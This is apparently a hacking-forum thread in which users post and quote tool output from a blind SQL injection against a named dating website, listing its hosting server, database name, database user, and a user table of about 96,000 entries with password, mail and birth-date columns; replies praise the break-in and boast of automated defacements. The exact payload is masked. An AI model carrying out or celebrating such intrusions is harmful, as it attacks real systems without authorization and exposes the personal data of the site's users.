SECOND HACK
by - Thursday, January 1, 1970 at 12:00 AM
lemme see
Reply
good work
Reply
Nice work
Reply
(July 16, 2022, 08:49 PM)34585 Wrote: Wow what a great H4ck0r you are :kappa:

Parameter: #1* (URI)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: https://www.meetup4fun.com:443/******


web application technology: Apache, Nginx
back-end DBMS: active fingerprint: MySQL >= 5.7
              comment injection fingerprint: MySQL 5.7.32
              html error message fingerprint: MySQL

current database: 'db5mdetearbdmq'

hostname: 'c91995.sgvps.net'

current user is DBA: False

database management system users [1]:
[*]'ucgjm2ujpnbrh'@'localhost'

database management system users privileges:
[*]'ucgjm2ujpnbrh'@'localhost' [1]:
    privilege: USAGE

database management system users roles:
[*]'ucgjm2ujpnbrh'@'localhost' [1]:
    role: USAGE

available databases [2]:
[*]db5mdetearbdmq
[*]information_schema

Database: db5mdetearbdmq
+----------+---------+
| Table    | Entries |
+----------+---------+
| `user`  | 96227  |
+----------+---------+

Database: db5mdetearbdmq
[192 tables]


User Sample:
active mail password name role type gender city state zip country birth

[*]
ok
Reply
Nice one :)
Reply
(July 16, 2022, 08:49 PM)34585 Wrote: Wow what a great H4ck0r you are :kappa:

Parameter: #1* (URI)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: https://www.meetup4fun.com:443/******


web application technology: Apache, Nginx
back-end DBMS: active fingerprint: MySQL >= 5.7
              comment injection fingerprint: MySQL 5.7.32
              html error message fingerprint: MySQL

current database: 'db5mdetearbdmq'

hostname: 'c91995.sgvps.net'

current user is DBA: False

database management system users [1]:
[*]'ucgjm2ujpnbrh'@'localhost'

database management system users privileges:
[*]'ucgjm2ujpnbrh'@'localhost' [1]:
    privilege: USAGE

database management system users roles:
[*]'ucgjm2ujpnbrh'@'localhost' [1]:
    role: USAGE

available databases [2]:
[*]db5mdetearbdmq
[*]information_schema

Database: db5mdetearbdmq
+----------+---------+
| Table    | Entries |
+----------+---------+
| `user`  | 96227  |
+----------+---------+

Database: db5mdetearbdmq
[192 tables]


User Sample:
active mail password name role type gender city state zip country birth

[*]
It's hilarious how he found a vulnerable site and just posted it as a joke.
Reply
solid job mate
Reply
(July 16, 2022, 08:59 PM)34585 Wrote:
(July 16, 2022, 08:52 PM)spice Wrote: [*]
You didnt even deface it 1ee7 virgin nerd

[*]
Yes Defacing is for pussys


agree defacing was popular back on 2008,2009,2010,2011 but not so much now....... I have like uncountable of them..since it was all automated
Beneath this mask there is more than flesh. Beneath this mask there is an idea, and ideas are bulletproof.

Reply


 Users viewing this thread: SECOND HACK: No users currently viewing.